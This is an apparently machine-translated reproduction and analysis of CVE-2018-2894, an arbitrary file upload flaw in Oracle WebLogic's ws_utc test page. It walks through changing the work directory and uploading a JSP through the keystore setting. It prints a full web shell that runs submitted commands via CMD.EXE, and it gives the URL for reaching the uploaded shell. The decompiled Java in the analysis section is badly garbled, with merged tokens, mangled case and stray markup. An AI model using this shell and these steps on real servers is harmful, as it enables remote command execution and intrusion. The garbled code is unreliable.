cve-2018-2894
Vulnerability Impact version: 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
: Http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip
Vulnerability replication
After the service starts, Access http://localhost:7001/ws_utc/config.do
You can change the current working directory to a different directory. The local environment, for example, can be deployed to the C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war
next
Select the right 安全
column to add the JKS Keystores
upload file. Assume the chybeta.jsp
following:
<%@PageImport="Java.util.*,java.io.*,java.net.*"%><HTML><BODY><formMethod="POST"Name="MyForm"action=""><inputType="Text"Name="CMD"><inputType="Submit"Value="Send"></FORM><pre><%If(Request.GetParameter("CMD")!=Null){Out.println("Command:"+Request.GetParameter("CMD")+"\n<br>");ProcessP=Runtime.GetRuntime().Exec("CMD.EXE/C"+Request.GetParameter("CMD"));OutputStreamOs=P.Getoutputstream();InputStreamInch=P.getInputStream();DataInputStreamDis=Newdatainputstream (instring disr = dis. Readline (); while (disr != null ) {out. Println (disrdisr = dis. Readline (); } }%></pre></BODY >
The capture packet gets to the timestamp 1531987145013
, then the uploaded position isconfig\keystore\1531987145013_chybeta.jsp
Accesshttp://localhost:7001/ws_utc/config/keystore/1531987145013_chybeta.jsp
Brief vulnerability Analysis
In ws-testpage-impl.jar!/com/oracle/webservices/testclient/setting/TestClientWorkDirManager.class:59
:
PublicvoidChangeworkdir(StringPath){String[]Oldpaths=This.Getrelatedpaths();If(This.Testpageprovider.Getwsimpltype()==Impltype.JRF){This.Isworkdirchangeable=False;This.Isworkdirwritable=Isdirwritable(Path);This.Isworkdirchangeable=True;This.Settestclientworkdir(Path);}Else{This.Persistworkdir(Path);This.Init();}if (this. Isworkdirwritable) {string[] Newpaths = this. (); movedirs (oldpathsnewpaths< Span class= "O" >); } else {logger. Fine ( "[INFO] newly specified testclient working Dir is readonly. Won ' t move the configuration stuff to new path. " } /span>
This function is used to change the working directory, but it does not do any testing.
In the ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/res/SettingResource.class:181
:
@Path("/keystore")@POST@Produces({"Application/xml","Application/json"})@Consumes({"Multipart/form-data"})PublicResponseEditkeystoresettingbymultipart(FormdatamultipartFormpartparams){If(!Requestutil.Isrequstedbyadmin(This.Request)){ReturnResponse.Status(Status.FORBIDDEN).Build();}Else{If(Testclientrt.Isverbose()){Logger.Fine("Calling Settingresource.addkeystoresettingbymultipart");}StringCurrenttimevalue=""+ (new date ()). (); keyvaluesmap<stringString< Span class= "o" >> formparams = rsdatahelper.< Span class= "NA" >getinstance (). (formpartparamstrue< Span class= "O", testclientrt. (), currenttimevalue} } /span>
Follow inws-testpage-impl.jar!/com/oracle/webservices/testclient/core/ws/cdf/config/parameter/TestClientRT.class:31
GetkeystorepathgetconfigdirFile." KeyStore "}
Gets the path to write storePath
.
In ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/util/RSDataHelper.class:145
:
PublicKeyvaluesmap<String,String>Convertformdatamultipart(FormdatamultipartFormpartparams,BooleanIsextactattachment,StringPath,StringFilenameprefix){...If(Attachname!=Null&&Attachname.Trim().Length()>0){If(Attachname!=Null&&Attachname.Trim().Length()!=0){Attachname=This.Refactorattachname(Attachname);If(Filenameprefix==Null){Filenameprefix=Key;}StringFileName=(NewFile(Storepath,Filenameprefix+"_"+Attachname)).GetAbsolutePath (); kvmap. (keyfilenameif (isextactattachment{this. (filename () bodypart. (inputstream. Class} } } ... /span>
Upload the contents of the file into the storePath
directory, the file name is satisfied fileNamePrefix + "_" + attachName
. This process does not have any filtering and checking:) ...
Conditions:
- Need to know the Web directory where your app is deployed
ws_utc/config.do
Certification is not required in development mode and requires certification in production mode. See Oracle for specific visibility? Fusion Middleware administering Web Services
WebLogic arbitrary file Upload Vulnerability recurrence and analysis-"cve-2018-2894"